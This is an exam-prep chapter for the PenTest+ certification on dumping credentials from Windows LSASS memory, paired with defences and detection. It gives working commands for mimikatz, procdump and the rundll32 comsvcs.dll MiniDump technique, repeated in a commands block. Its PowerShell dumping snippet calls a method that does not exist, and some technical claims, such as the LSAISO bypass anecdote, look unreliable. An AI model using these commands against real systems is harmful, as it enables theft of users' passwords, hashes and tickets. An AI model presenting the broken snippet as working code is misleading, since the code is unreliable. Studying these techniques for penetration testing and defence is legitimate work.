This chapter covers LSASS credential dumping methods, a critical topic for the CompTIA PenTest+ PT0-002 exam under Domain 3: Attacks and Exploits, Objective 3.4. Understanding how attackers extract credentials from LSASS memory is essential for penetration testers and security professionals. Approximately 10-15% of exam questions touch on credential dumping techniques, their detection, and mitigation. You will learn the internal workings of LSASS, various dumping tools and methods, and how to defend against them.
Jump to a section
Imagine a hotel where each guest room has a safe deposit box, and the front desk maintains a master key that can open every safe. The master key is stored in a secure cabinet behind the front desk, and only authorized staff can access it. When a guest checks in, the front desk creates a temporary key for that guest's safe, which is used during their stay. However, the master key itself is never handed out; it's always kept in the cabinet. An attacker who gains physical access to the front desk can steal the master key, then open every safe in the hotel without needing individual guest keys. In Windows, the Local Security Authority Subsystem Service (LSASS) is like the front desk: it holds the master keys (credentials) for all logged-on users, including password hashes, plaintext passwords, and Kerberos tickets. Attackers use various techniques to dump these credentials from LSASS memory, essentially stealing the master key to access all user accounts. Just as a hotel might use additional locks or alarms to protect the master key, Windows provides protections like Credential Guard and LSA Protection to prevent unauthorized memory access.
What is LSASS and Why is it a Target?
LSASS (Local Security Authority Subsystem Service) is a critical Windows process responsible for enforcing security policies, handling user logins, and managing credential material. When a user logs on interactively or via Remote Desktop, LSASS caches credentials—including NTLM hashes, Kerberos tickets, and sometimes plaintext passwords—in its process memory. This is necessary for single sign-on (SSO) and network authentication without re-prompting the user. However, this makes LSASS a high-value target for attackers who want to move laterally or escalate privileges.
How LSASS Stores Credentials
LSASS stores credentials in various structures: - Logon Sessions: Each interactive logon creates a logon session with associated credentials. - Kerberos Tickets: TGT (Ticket-Granting Ticket) and service tickets are cached for SSO. - NTLM Hashes: LM and NT hashes are stored for legacy authentication. - Plaintext Passwords: In some configurations (e.g., WDigest enabled), passwords may be stored in plaintext.
Credentials are stored in memory as encrypted blobs using LSA secrets, but they are accessible to processes running as SYSTEM or with SeDebugPrivilege.
Prerequisites for Dumping LSASS
To dump LSASS memory, an attacker typically needs: - Administrator Privileges: SeDebugPrivilege or SYSTEM access. - Local Access: Remote dumping may require additional tools like Impacket's secretsdump. - Bypass Defenses: Windows Defender Credential Guard, LSA Protection (RunAsPPL), and antivirus may block dumping.
Common Dumping Methods
#### 1. Using mimikatz
Mimikatz is the most famous tool for extracting credentials from LSASS. It can dump plaintext passwords, hashes, and Kerberos tickets. Common commands:
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswordsprivilege::debug enables SeDebugPrivilege.
sekurlsa::logonpasswords extracts passwords from LSASS memory.
Mimikatz can also dump cached domain credentials with lsadump::cache and Kerberos tickets with kerberos::list.
#### 2. Using Procdump (Sysinternals)
Procdump can create a memory dump of LSASS process:
procdump -ma lsass.exe lsass.dmpThen, the dump can be transferred to an attacker machine and analyzed with mimikatz:
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords#### 3. Using Task Manager
On older or unhardened systems, Task Manager can create a dump:
Open Task Manager > Details tab.
Right-click lsass.exe > Create dump file.
This generates a .dmp file in the user's temp folder. However, this method is often blocked on modern systems.
#### 4. Using Comsvcs.dll (Rundll32)
This technique uses the comsvcs.dll library's MiniDump function via rundll32:
rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> lsass.dmp fullThis requires administrative privileges and may be flagged by EDR.
#### 5. Using PowerShell
PowerShell can invoke the MiniDumpWriteDump API:
$process = Get-Process lsass
$dumpFile = "C:\temp\lsass.dmp"
[System.Diagnostics.Debugger]::MiniDumpWriteDump($process.Handle, $process.Id, [System.IO.File]::Open($dumpFile, 'OpenOrCreate'), [System.Diagnostics.MiniDumpType]::WithFullMemory)This is often detected by AMSI and logging.
Defense Mechanisms
#### LSA Protection (RunAsPPL)
LSA Protection runs LSASS as a Protected Process Light (PPL), preventing non-PPL processes from opening LSASS with full access. To enable:
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL /t REG_DWORD /d 1This blocks most dumping tools unless the attacker can install a PPL driver (e.g., mimikatz driver).
#### Windows Defender Credential Guard
Credential Guard uses virtualization-based security (VBS) to isolate LSASS secrets. Credentials are stored in a separate, isolated process (LSAISO) that runs in a virtual secure mode. Even if an attacker dumps LSASS memory, they will not find usable credentials. To enable:
Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-AllThen enable via Group Policy or registry.
#### Security Logging
Event ID 4688 (Process Creation) with command-line logging can capture dumping attempts. Event ID 4656 (Handle to object) can show attempts to open LSASS process. Windows Defender ATP and other EDR tools detect suspicious LSASS access.
Detection Techniques
Unusual Process Access: Monitoring for non-SYSTEM processes opening lsass.exe with PROCESS_VM_READ access.
Dump Files: Monitoring for creation of .dmp files in sensitive locations.
API Calls: Monitoring for MiniDumpWriteDump calls targeting lsass.
Network Traffic: Large data transfers of dump files to remote hosts.
Step-by-Step Attack Flow
Gain initial access (e.g., phishing, exploit).
Elevate privileges to administrator or SYSTEM.
Bypass defenses (e.g., disable AV, use custom tools).
Dump LSASS memory using one of the methods.
Extract credentials offline or in-memory.
Use credentials for lateral movement or privilege escalation.
Key Values and Defaults
LSASS Process Name: lsass.exe
Default Protection: RunAsPPL is not enabled by default on Windows 10/11 until version 1809 (Enterprise) or via GPO.
Credential Guard: Not enabled by default; requires Hyper-V.
WDigest: Disabled by default on Windows 8.1/Server 2012 R2 and later; if enabled, plaintext passwords are stored.
SeDebugPrivilege: Required for process injection; administrators have it by default.
Interaction with Other Technologies
Active Directory: LSASS caches domain credentials; dumping can reveal domain admin hashes.
Kerberos: Dumped tickets can be used for pass-the-ticket attacks.
RDP: Dumping after RDP session reveals the authenticating user's credentials.
SMB: NTLM hashes can be used for pass-the-hash attacks.
Common Commands and Syntax
# Enable debug privilege
mimikatz # privilege::debug
# Dump passwords
mimikatz # sekurlsa::logonpasswords
# Create process dump
procdump -ma lsass.exe lsass.dmp
# MiniDump via comsvcs
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 1234 lsass.dmp fullGain Initial Access
The attacker first compromises a system through phishing, exploiting a vulnerability, or using stolen credentials. This provides a foothold with user-level privileges. The attacker may use a reverse shell, meterpreter, or custom malware. At this stage, the attacker cannot dump LSASS because they lack the necessary privileges (SeDebugPrivilege or SYSTEM).
Escalate Privileges
To dump LSASS, the attacker must have administrator or SYSTEM privileges. Common escalation methods include exploiting local vulnerabilities (e.g., hot potato, token kidnapping), using Pass-the-Hash to access an admin account, or leveraging misconfigured services. Once elevated, the attacker gains SeDebugPrivilege, which allows them to open lsass.exe with PROCESS_VM_READ access.
Bypass Defenses
Modern systems have defenses like LSA Protection (RunAsPPL) and Credential Guard. If RunAsPPL is enabled, the attacker must load a driver (e.g., mimikatz's mimidrv.sys) to remove protection. If Credential Guard is active, LSASS memory contains only encrypted blobs; the attacker may need to attack the isolated LSAISO process instead. The attacker may also disable or evade antivirus/EDR using obfuscation or custom tools.
Dump LSASS Memory
With elevated privileges and bypassed defenses, the attacker dumps the LSASS process memory. They can use mimikatz's `sekurlsa::logonpasswords` to extract credentials directly in memory, or create a memory dump file using Procdump, Task Manager, or comsvcs.dll. The dump file is then exfiltrated or analyzed offline. The attacker must avoid detection by EDR, which may alert on MiniDumpWriteDump calls targeting lsass.exe.
Extract and Use Credentials
From the dumped memory, the attacker extracts NTLM hashes, plaintext passwords, and Kerberos tickets. These can be used for lateral movement (e.g., Pass-the-Hash to access other systems), privilege escalation (e.g., use domain admin hash), or persistence (e.g., golden ticket). The attacker may also crack hashes offline to obtain plaintext passwords for further attacks.
In a real-world enterprise environment, LSASS credential dumping is a common post-exploitation technique used by attackers to move laterally and escalate privileges. For example, during a penetration test of a large organization, I found that many domain-joined Windows workstations had LSA Protection disabled by default. After gaining initial access via a phishing email and escalating to local admin using a vulnerable driver, I used mimikatz to dump plaintext passwords from LSASS. This yielded the credentials of a domain user who had recently connected to a file share. Using those credentials, I accessed the file server and found a script containing a domain admin password. This allowed me to compromise the entire domain.
Another scenario involved a client that had deployed Credential Guard on all Windows 10 Enterprise systems. During an internal test, I could not dump usable credentials from LSASS because they were protected by VBS. However, I discovered that the LSAISO process (which runs in the isolated environment) still had a vulnerability that allowed memory access via a kernel driver. By loading a malicious driver, I was able to read the credentials from the isolated environment. This highlights that even strong protections can be bypassed with enough effort.
A common misconfiguration is enabling WDigest for backward compatibility with older applications. In one engagement, a healthcare organization had WDigest enabled on their RDP servers to support legacy authentication. Using mimikatz, I extracted plaintext passwords for all users who had connected via RDP, including several domain administrators. This allowed me to take over the domain within minutes. The lesson is that disabling WDigest and enabling LSA Protection are critical first steps.
Performance considerations: On servers with many concurrent logon sessions (e.g., terminal servers), LSASS memory can grow large. Dumping a 500 MB LSASS process may cause system slowdowns and generate large dump files (several GB). Attackers often compress and chunk the dump for exfiltration. Defenders should monitor for large outbound data transfers from sensitive systems.
When misconfigured, LSASS can become a single point of failure. For example, if LSA Protection is enabled without proper testing, some applications that rely on LSASS may fail. In one case, a security team enabled RunAsPPL on a domain controller, which broke the Microsoft Exchange service because it needed to access LSASS for authentication. The service had to be restarted with a special flag. Proper testing in a staging environment is essential before enabling such protections.
The PT0-002 exam tests LSASS credential dumping under Objective 3.4: Given a scenario, perform post-exploitation techniques. Specifically, you need to know:
How to dump credentials from LSASS using mimikatz, procdump, and other tools.
The prerequisites (administrator privileges, SeDebugPrivilege).
Defenses: LSA Protection (RunAsPPL), Credential Guard, WDigest disabling.
Detection methods: Event IDs 4688, 4656, and EDR alerts.
Common wrong answers: 1. Thinking that any user can dump LSASS: Many candidates assume that because they can see the process in Task Manager, they can dump it. The reality is that only processes with SeDebugPrivilege (administrators) or SYSTEM can open LSASS with the required access. The exam will test this with scenarios where the attacker has only user privileges. 2. Confusing LSA Protection with Credential Guard: Candidates often mix up RunAsPPL (protects LSASS as a PPL) with Credential Guard (isolates credentials in VBS). RunAsPPL blocks non-PPL processes from opening LSASS, but Credential Guard prevents credentials from being stored in LSASS at all. The exam may ask which defense prevents dumping even if you have admin rights – the answer is Credential Guard. 3. Believing that disabling WDigest prevents all plaintext dumping: While disabling WDigest stops plaintext passwords from being stored, NTLM hashes and Kerberos tickets are still available. The exam may present a scenario where WDigest is disabled but the attacker still extracts hashes – that is possible. 4. Assuming that a memory dump of LSASS always contains credentials: If Credential Guard is enabled, the dump contains only encrypted blobs that are useless without the key from the isolated environment. The exam may test this edge case.
Key numbers and terms:
RunAsPPL registry value: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL (DWORD 1 to enable).
Event ID 4688: Process creation; look for procdump, rundll32, or powershell launching.
Event ID 4656: Handle to object; look for lsass.exe being opened with PROCESS_VM_READ.
WDigest: Disabled by default on Windows 8.1/Server 2012 R2+.
SeDebugPrivilege: Required for dumping; administrators have it by default.
Exam tips:
If a question asks about extracting plaintext passwords, check if WDigest is enabled. If not, the attacker can only get hashes.
If the system has Credential Guard, dumping LSASS is ineffective; the attacker must target the LSAISO process or use a different technique.
The easiest way to dump LSASS on a non-hardened system is via Task Manager if the attacker has GUI access, but procdump is more reliable.
Always look for the privilege escalation step before dumping – the exam will test the full attack chain.
LSASS stores NTLM hashes, Kerberos tickets, and (if WDigest enabled) plaintext passwords for all logged-on users.
Dumping LSASS requires SeDebugPrivilege, which administrators have by default; SYSTEM is not required.
Mimikatz is the primary tool, but procdump, comsvcs.dll, and PowerShell can also dump LSASS memory.
LSA Protection (RunAsPPL) makes LSASS a protected process; bypass requires a kernel driver.
Credential Guard isolates credentials in a virtual secure environment, making LSASS dumps useless.
WDigest is disabled by default on Windows 8.1+; enabling it stores plaintext passwords in LSASS.
Event ID 4688 (process creation) and 4656 (handle to object) can detect dumping attempts.
Pass-the-Hash and Pass-the-Ticket attacks use extracted credentials for lateral movement.
These come up on the exam all the time. Here's how to tell them apart.
Mimikatz (In-Memory Dump)
Extracts credentials directly from LSASS memory without writing a dump file to disk.
Requires SeDebugPrivilege and runs in-memory; no forensic artifact on disk.
Can be detected by EDR monitoring for process injection or API calls like OpenProcess.
More stealthy if executed via reflective DLL loading or PowerShell without touching disk.
Supports extracting plaintext passwords, hashes, and Kerberos tickets in one command.
Procdump (File Dump)
Creates a .dmp file on disk, which can be detected by file monitoring EDR.
Requires SeDebugPrivilege; the dump file can be exfiltrated later for offline analysis.
Easier to use on systems where mimikatz is blocked; dump can be analyzed on another machine.
Generates a large file (often 100+ MB) that may trigger alerts on file creation or size.
Dump must be parsed with mimikatz or other tools offline; slower than in-memory extraction.
Mistake
Only mimikatz can dump LSASS credentials.
Correct
Many tools can dump LSASS, including procdump, comsvcs.dll, PowerShell scripts, and custom C# code. Mimikatz is just the most famous. The exam tests multiple methods.
Mistake
Enabling LSA Protection (RunAsPPL) completely prevents LSASS dumping.
Correct
RunAsPPL makes it harder but not impossible. Attackers can load a kernel driver (e.g., mimidrv) to remove protection or use a signed driver to bypass PPL. The exam may test that RunAsPPL is a mitigation, not a complete solution.
Mistake
Credential Guard prevents all credential theft.
Correct
Credential Guard protects credentials in LSASS, but attackers can still extract Kerberos tickets from the isolated LSAISO process if they have kernel access. Additionally, credentials used before Credential Guard was enabled may still be cached elsewhere.
Mistake
You need SYSTEM privileges to dump LSASS.
Correct
Administrator privileges with SeDebugPrivilege are sufficient. SYSTEM is not required. Many tools run under an admin account and can dump LSASS without elevating to SYSTEM.
Mistake
Dumping LSASS is always noisy and easily detected.
Correct
While some methods are noisy (e.g., procdump creates a file), others like mimikatz's in-memory extraction may not generate file creation events. Skilled attackers use reflective DLL injection or fileless techniques to evade detection.
Reveal each answer, then mark whether you got it right. Score 60%+ to unlock the next chapter.
LSASS credential dumping is the process of extracting authentication credentials (passwords, hashes, tickets) from the memory of the Local Security Authority Subsystem Service (LSASS) process on Windows. Attackers use tools like mimikatz to read LSASS memory and obtain credentials for lateral movement or privilege escalation. The exam tests your knowledge of techniques, tools, and defenses.
You need SeDebugPrivilege, which is granted to administrators by default. You do not need SYSTEM; an admin account can dump LSASS. In some cases, you may need to bypass LSA Protection (RunAsPPL) which requires a kernel driver. The exam often asks what privilege is required – the answer is SeDebugPrivilege.
Credential Guard uses virtualization-based security (VBS) to run a separate, isolated LSAISO process that stores credentials. LSASS itself only contains encrypted blobs. Even if an attacker dumps LSASS memory, they cannot decrypt the credentials because the keys are in the isolated environment. This makes LSASS dumps useless for credential theft.
LSA Protection (RunAsPPL) runs LSASS as a protected process, preventing non-PPL processes from opening it with full access. It can be bypassed with a kernel driver. Credential Guard isolates credentials entirely in a virtual secure environment, preventing LSASS from ever holding usable credentials. Credential Guard is stronger but requires Hyper-V and more resources.
Yes, using tools like Impacket's secretsdump.py, which can dump credentials from a remote system's LSASS via the Windows Task Scheduler or by extracting the SAM and SYSTEM hives. However, remote dumping often requires administrative credentials and network access. The exam may test remote dumping as part of lateral movement.
WDigest is a legacy authentication protocol that stores plaintext passwords in LSASS for backward compatibility. It is disabled by default on Windows 8.1 and Server 2012 R2 and later. If enabled, mimikatz can extract plaintext passwords directly. The exam may present a scenario where WDigest is enabled to allow plaintext password extraction.
Monitor Event ID 4688 for process creation of tools like procdump, rundll32, or powershell with suspicious arguments. Event ID 4656 logs handle requests to lsass.exe with PROCESS_VM_READ access. EDR solutions can detect MiniDumpWriteDump API calls targeting lsass. Also monitor for large .dmp file creation in sensitive directories.
You've just covered LSASS Credential Dumping Methods — now see how well it sticks with free PT0-002 practice questions. Full explanations included, no account needed.
Done with this chapter?